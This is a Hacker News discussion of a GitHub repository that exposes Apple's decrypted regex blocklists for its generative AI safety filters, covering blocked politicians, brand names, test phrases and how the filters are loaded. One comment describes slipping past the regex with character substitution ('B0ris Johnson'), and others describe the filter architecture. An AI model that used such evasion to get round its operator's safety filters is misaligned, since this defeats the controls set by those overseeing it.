Filtering on the words "execute" and "executing" is going to create problems if you want to build agents that execute commands.

baxtr11mo ago

Don’t be so judgmental. People in corporate America do have their priorities right!

raverbashing11mo ago

This seems to be for "region/CN" China?

pwagland11mo ago

This is, but there is an almost identical file, assumedly for the non CN regions: https://github.com/BlueFalconHD/apple_generative_model_safet...

This is the same, except for one additional slur word.

lostlogin11mo ago

I’m always irritated at reference to MAC computers, so I’m with Apple on this one.

bawana11mo ago· 17 in thread

Alexandra Ocasio Cortez triggers a violation?

https://github.com/BlueFalconHD/apple_generative_model_safet...

mmaunder11mo ago

As does:

   "(?i)\\bAnthony\\s+Albanese\\b",
    "(?i)\\bBoris\\s+Johnson\\b",
    "(?i)\\bChristopher\\s+Luxon\\b",
    "(?i)\\bCyril\\s+Ramaphosa\\b",
    "(?i)\\bJacinda\\s+Arden\\b",
    "(?i)\\bJacob\\s+Zuma\\b",
    "(?i)\\bJohn\\s+Steenhuisen\\b",
    "(?i)\\bJustin\\s+Trudeau\\b",
    "(?i)\\bKeir\\s+Starmer\\b",
    "(?i)\\bLiz\\s+Truss\\b",
    "(?i)\\bMichael\\s+D\\.\\s+Higgins\\b",
    "(?i)\\bRishi\\s+Sunak\\b",

https://github.com/BlueFalconHD/apple_generative_model_safet...

Edit: I have no doubt South African news media are going to be in a frenzy when they realize Apple took notice of South African politicians. (Referring to Steenhuisen and Ramaphosa specifically)

userbinator11mo ago

I'm not surprised that anything political is being filtered, but this should definitely provoke some deep consideration around who has control of this stuff.

2 more replies

skissane11mo ago

1 more reply

echelon11mo ago

Apple's 1984 ad is so hypocritical today.

This is Apple actively steering public thought.

No code - anywhere - should look like this. I don't care if the politicians are right, left, or authoritarian. This is wrong.

2 more replies

beAbU11mo ago

Irish Prez is also in that list, also current and former British PMs and other world leaders.

So I don't think its anything specifically related to SA going on here.

1 more reply

armchairhacker11mo ago

Also “Biden” and “Trump” but the regex is different.

https://github.com/BlueFalconHD/apple_generative_model_safet...

1 more reply

mvdtnz11mo ago

They spelled Jacinda Ardern's name wrong.

2 more replies

michaelt11mo ago

bigyabai11mo ago

Particularly the models owned by CEOs who suck-up to authoritarianism, one could imagine.

lupire11mo ago

Maybe so, but think about how such a thing would be technically implemented, and how it would lead to false positives and false negatives, and what the consequences would be.

jofzar11mo ago

AOC is very vocal about AI and is leading a bill related to AI. It's probably a "let's not fuck around and find out" situation

https://thehill.com/policy/technology/5312421-ocasio-cortez-...

AmazingTurtle11mo ago

"driving with Focus turned on"

https://github.com/BlueFalconHD/apple_generative_model_safet...

thih911mo ago

For context, the “Focus” refers to an iOS feature that minimizes distractions: https://support.apple.com/en-gb/guide/iphone/iphd6288a67f/io...

bahmboo11mo ago

Perhaps in context? Maybe the training data picked up on her name as potentially used as a "slur" associated with her race. Wonder if there are others I know I can look.

FateOfNations11mo ago

interesting, that's specifically in the Spanish localization.

cpa11mo ago

I think that’s because she’s been victim of a lot of deep fake porn

HeckFeck11mo ago

How does this explain Boris Johnson or Liz Truss?

4 more replies

binarymax11mo ago· 12 in thread

Wow, this is pretty silly. If things are like this at Apple I’m not sure what to think.

https://github.com/BlueFalconHD/apple_generative_model_safet...

EDIT: just to be clear, things like this are easily bypassed. “Boris Johnson”=>”B0ris Johnson” will skip right over the regex and will be recognized just fine by an LLM.

deepdarkforest11mo ago

It's not silly. I would bet 99% of the users don't care that much to do that. A hardcoded regex like this is a good first layer/filter, and very efficient

BlueFalconHDOP11mo ago

Yep. These filters are applied first before the safety model (still figuring out the architecture, I am pretty confident it is an LLM combined with some text classification) runs.

1 more reply

twoodfin11mo ago

Efficient at what?

tpmoney11mo ago

XorNot11mo ago

3 more replies

bigyabai11mo ago

> If things are like this at Apple I’m not sure what to think.

Aeolun11mo ago

The LLM will. But the image generation model that is trained on a bunch of pre-specified tags will almost immediately spit out unrecognizable results.

Lockal11mo ago

the_mar11mo ago

why do you think this doesn't already exist?

miohtama11mo ago

Sounds like UK politics is taboo?

immibis11mo ago

All politics is taboo, except the sort that helps Apple get richer. (Or any other company, in that company's "safety" filters)

stefan_11mo ago

Meanwhile their software devs are making GenerativeExperiencesSafetyInferenceProviders so it must be dire over there, too.

mike_hearn11mo ago· 12 in thread

Are you sure it's fully deobfuscated? What's up with reject phrases like "Granular mango serpent"?

pbhjpbhj11mo ago

Thus a pre-prompt can avoid mentioning the actual forbidden words, like using a patois/cant.

electroly11mo ago

"GMS" = Generative Model Safety. The example from the readme is "XCODE". These seem to be acronyms spelled out in words.

BlueFalconHDOP11mo ago

This is definitely the right answer. It’s just testing stuff.

RainyDayTmrw11mo ago

I commented in another thread[1] that it's most likely a unique, artificial QA input, to avoid QA having to repeatedly use offensive phrases or whatever.

[1] https://news.ycombinator.com/item?id=44486374

tablets11mo ago

Maybe something to do with this? https://en.m.wikipedia.org/wiki/Mango_cult

BlueFalconHDOP11mo ago

consonaut11mo ago

If you try to use the phrase with Apple Intelligence (e.g. in Notes asking for a rewrite) it will just say "Writing tools unavailable".

Maybe it's an easy test to ensure the filters are loaded with a phrase unlikely to be used accidentaly?

andy9911mo ago

I clicked around a bit and this seems to be the most common phrase. Maybe it's a test phrase?

the-rc11mo ago

Maybe it's used to catch clones of the models?

airstrike11mo ago

the one at the bottom of the README spells out xcode

wyvern illustrous laments darkness

cwmoore11mo ago

read every good expletive “xxx”

KTibow11mo ago

Maybe it's used to verify that the filter is loaded.

torginus11mo ago· 11 in thread

I find it funny that AGI is supposed to be right around the corner, while these supposedly super smart LLMs still need to get their outputs filtered by regexes.

jonas2111mo ago

I don't think anyone believes Apple's LLMs are anywhere near state of the art (and certainly not their on-device LLMs).

lupire11mo ago

Apple isn't the only one doing this.

fastball11mo ago

To be fair, there are people who I sometimes wish I could filter with regex.

cyanydeez11mo ago

It's similar to how all the new power sources are basically just "cool, lets boil water with it"

raxxorraxor11mo ago

And then let's put it into a steam engine.

crazylogger11mo ago

jama21111mo ago

It’s more funny that anyone is taking your comment seriously. You may as well ask “if self driving cars are so smart why do they still need tyres?”

fl0id11mo ago

Actually even of their was AGI, it would be even more necessary to control it.

mailund11mo ago

I feel that if teenagers are able to trivially bypass illegal-word filters by substituting with words that obviously mean the same thing, I think an AGI wouldn't be too inhibited by this either

bahmboo11mo ago

This is just policy and alignment from Apple. Just because the Internet says a bunch of junk doesn't mean you want your model spewing it.

wistleblowanon11mo ago

6 more replies

userbinator11mo ago· 10 in thread

energy12311mo ago

troupo11mo ago

> is not the same thing as a private company inside a democracy censoring their product to avoid bad press and

Yet this private company has more power and influence than most countries. And there are several such companies. We already live in sci fi corporate dystopia, we just haven't fully realised it yet.

2 more replies

Hackbraten11mo ago

But who of the general populace has the technical skill to replace their on-device assistant with a free one? And that's if Apple even allows that?

In practice, there's not that much difference between a megacorporate monopolist and a state.

2 more replies

xk_id11mo ago

Except Apple has a country’s worth of users, whose livelihoods are reliant on them. The “state democracy” is right now more subordinated to tech oligarchies, than vice versa.

madeofpalk11mo ago

ryandrake11mo ago

When the choice is between 1. "avoid tarnishing my own brand" and 2. "doing what the user requested," corporations will always choose option 1. Who is this software supposed to be serving, anyway?

2 more replies

userbinator11mo ago

If that's what the message actually said, why would the media be complaining? Or do you mean false positives?

jeroenhd11mo ago

I still remember when "bush hid the facts" went around the news cycle. Entertainment services will absolutely slam and misrepresent any small mistake made by large companies.

This isn't 1984 as much as it's companies trying to hide that their software isn't ready for real world use by patching up the mistakes in real time.

cyanydeez11mo ago

In america is due to lawyers, nothing more.

Ya'll love capitalism until it starts manipulating the populace into the safest space to sell you garbage you dont need.

Then suddenly its all "ma free speech"

SV_BubbleTime11mo ago

Right, because the European models coming out are super SOTA? Minstrel is decent, but needs to be mixed with a ton of uncensored data to be useful.

1f60c11mo ago· 5 in thread

It's pretty easy to understand why Apple doesn't want its models to reproduce racial slurs, but what’s wrong with "Boris Johnson?"

(See, e.g., here: https://github.com/BlueFalconHD/apple_generative_model_safet...)

nedt11mo ago

I think it's in there so you can't let it generate an email reply about how awesome peppa pig is.

qoez11mo ago

"Justin Trudeau" too. At least it's somewhat unbiased. Still weird imo.

vishnugupta11mo ago

There are other UK politicians as well? Interesting.

m3kw911mo ago

But allow hitler?

stripline11mo ago

Interesting that you picked one from the “B” words..

efitz11mo ago· 3 in thread

I’m going to change my name to “Granular Mango Serpent” just to see what those keywords are for in their safety instructions.

RainyDayTmrw11mo ago

[1] https://en.wikipedia.org/wiki/The_Magic_Words_are_Squeamish_... [2] https://en.wikipedia.org/wiki/SEO_contest

sweetjuly11mo ago

[1] https://en.wikipedia.org/wiki/EICAR_test_file

fouronnes311mo ago

Granular Mango Serpent is the new David Meyer.

https://arstechnica.com/information-technology/2024/12/certa...

MatekCopatek11mo ago· 3 in thread

So why are we doing this now? Has anything changed fundamentally? Why can't we let software do everything and then blame the user for doing bad things?

dkyc11mo ago

The example you gave about preventing money counterfeiting with technical measures also supports this, since this was an easier thing to detect technically, and so it was done.

Whether that's a good thing or bad thing everyone has to decide for themselves, but objectively I think this is the reason.

bhk11mo ago

In other words, to whatever extent they can control or manipulate the behavior of users, they will. In the limit t->∞, probably true.

3 more replies

MisterTea11mo ago

What's hard to understand here? Those tools require skill and time to develop. AI makes things like those racist posters and revenge porn completely effortless and instant.

Y_Y11mo ago· 3 in thread

Nice to see that we are protected from talking about these weird old dolls:

https://en.wikipedia.org/wiki/Golliwog

https://github.com/BlueFalconHD/apple_generative_model_safet...

sixothree11mo ago

I can remember the last time I saw one of these. It wasn't that long ago.

oblio11mo ago

Well, they're not only weird, they're obviously racist doll.

Ey7NFZ3P0nzAe11mo ago

I want to be able to talk bad about racist things.

1 more reply

Ey7NFZ3P0nzAe11mo ago· 2 in thread

Well it's one thing to regex filter "boris johnson" but i see that "chatgpt" is filtered too and that's f*** up:

https://github.com/BlueFalconHD/apple_generative_model_safet...

Ey7NFZ3P0nzAe11mo ago

Ffs it's also rejecting french words related to being poor or immigrant or even welfare:

https://github.com/BlueFalconHD/apple_generative_model_safet...

Aide sociale Chomeur Sans abri Démuni

That's insane!

kridsdale111mo ago

“Gemini” is in there too.

Cort3z11mo ago· 2 in thread

What are they protecting against? Honestly. LLMs should probably have an age limit, and then, if you are above, you should be adult enough to understand what this is and how it can be used.

To me, it seems like they only protect against bad press

matusp11mo ago

plutokras11mo ago

> What are they protecting against? Honestly.

They are protcting their producer from bad PR.

bombcar11mo ago· 2 in thread

There’s got to be a way to turn these lists of “naughty words” into shibboleths somehow.

spydum11mo ago

Love idea, but I think there are simply too many models to make it practical?

immibis11mo ago

However, I think about half of real humans would also fail the test.

azalemeth11mo ago· 2 in thread

[1] https://github.com/BlueFalconHD/apple_generative_model_safet...

supriyo-biswas11mo ago

I believe the "granular mango serpent" is an uncommon testing phrase that they use, although now with this discussion it has suffered the same fate as "correct horse battery staple.

The more concerning thing is that some of the locales like it-IT have a blocklist that contains most countries' names; I wonder what that's about.

whywhywhywhy11mo ago

Second one is an old slur in UK English.

Aeolun11mo ago· 2 in thread

Why Xylophone?

netsharc11mo ago

Just noticed "xylophone copious opportunity defined elephant" spells "xcode".

cynicalsecurity11mo ago

Maybe they use this obscure phrase for testing.

cluckindan11mo ago· 1 in thread

I think these are test data and not actual safety filters.

https://github.com/BlueFalconHD/apple_generative_model_safet...

BlueFalconHDOP11mo ago

This specific file you’ve referenced is rhetorical v1 format which solely handles substitution. It substitutes the offensive term with “test complete”

Animats11mo ago· 1 in thread

This may be test data. Found

     "golliwog": "test complete"

[1] https://github.com/BlueFalconHD/apple_generative_model_safet...

BlueFalconHDOP11mo ago

jjani11mo ago· 1 in thread

Did you only extract the English versions or is this as usual another case where big tech only cares to censor in English?

jeroenhd11mo ago

neuroticnews2511mo ago· 1 in thread

Aren't these [0] lines wrong?

"[\\b\\d][Aa]bbo[\\bA-Z\\d]",

\b inside a set (square brackets) is a backspace character [1], not a word boundary. I don't think it was intended? Or is the regex flavor used here different?

[0] https://github.com/BlueFalconHD/apple_generative_model_safet...

[1] https://developer.apple.com/documentation/foundation/nsregul...

BlueFalconHDOP11mo ago

The framework loading these is in Swift. I haven’t gotten around to the logic for the JSON/regex parsing but ChatGPT seems to understand the regexes just fine

extraduder_ire11mo ago· 1 in thread

This reminds me of the extensive list of regexes twitch had for filtering allowed usernames that came out when they were hacked.

efilife11mo ago

I had no idea about this, where can I read them?

rgovostes11mo ago· 1 in thread

BlueFalconHDOP11mo ago

Nope. This is a separate system. It’s not even abstracted for any asset, it is specifically only for these overrides. The decryption is done in the ModelCatalog private framework.

apricot11mo ago· 1 in thread

Quis custodiet ipsos custodes corporatum?

tempodox11mo ago

nemo videtur.

sandworm10111mo ago· 1 in thread

But i dont see the really bad stuff, the stuff i wont even type here. I guess that remains fair game. Apple's priorities remain as weird as ever.

immibis11mo ago

The International Criminal Court is banned from using Microsoft products. Corporations really don't want to be involved in anything controversial unless it brings correspondingly large profits.

skygazer11mo ago

kmfrk11mo ago

A lot of these terms are very weird and bland. Honestly I'm mostly reminded of Apple's bizarre censorship screw-up that didn't blow up that much, even though it was pretty uniquely embarrassing:

https://www.theverge.com/2021/3/30/22358756/apple-blocked-as...

waterproof11mo ago

Here's a combined file of all the non-locale-specific rules, for easier review: https://github.com/BlueFalconHD/apple_generative_model_safet...

It was generated as part of this PR to consolidate the metadata.json files: https://github.com/BlueFalconHD/apple_generative_model_safet...

RachelF11mo ago

In the 1970's George Carlin had "7 Words You Can't Say On TV" and got into legal trouble for saying them during his live skits.

Seems like Apple now has a list of 7,000 words you can't use on an iPhone now.

BlueFalconHDOP11mo ago

mindcrash11mo ago

So far I've found Adobe Firefly, Llama, ChatGPT, Claude and Claude AI are considered naughty words. There's probably more in the list, though.

What the actual fuck? Censorship much?

Applejinx11mo ago

The funny thing is, I have an AU/VST plugin for altering only the exponents not the mantissas of audio samples (simple powers of 2 multiply/divide) called BitShiftGain.

So there's a chain of machine interpretation by which Apple can decide I'm a Bad Man. I guess I'm more comfortable with Apple reaching this conclusion? I'll still try to avoid it though :)

noname12011mo ago

https://github.com/search?q=repo%3ABlueFalconHD%2Fapple_gene...

jacquesm11mo ago

These all condense to 'think different'. As long as 'different' coincides with Apple's viewpoints.

seeknotfind11mo ago

Long live regex!

jama21111mo ago

I swear the more I read comments here the more I just read old men shaking their fist at clouds… do better y’all.

zombot11mo ago

Who would have thought that this AI shit that is being forced on us ushers in a new round of censorship and control of formerly free speech! /s

j / k navigate · click thread line to collapse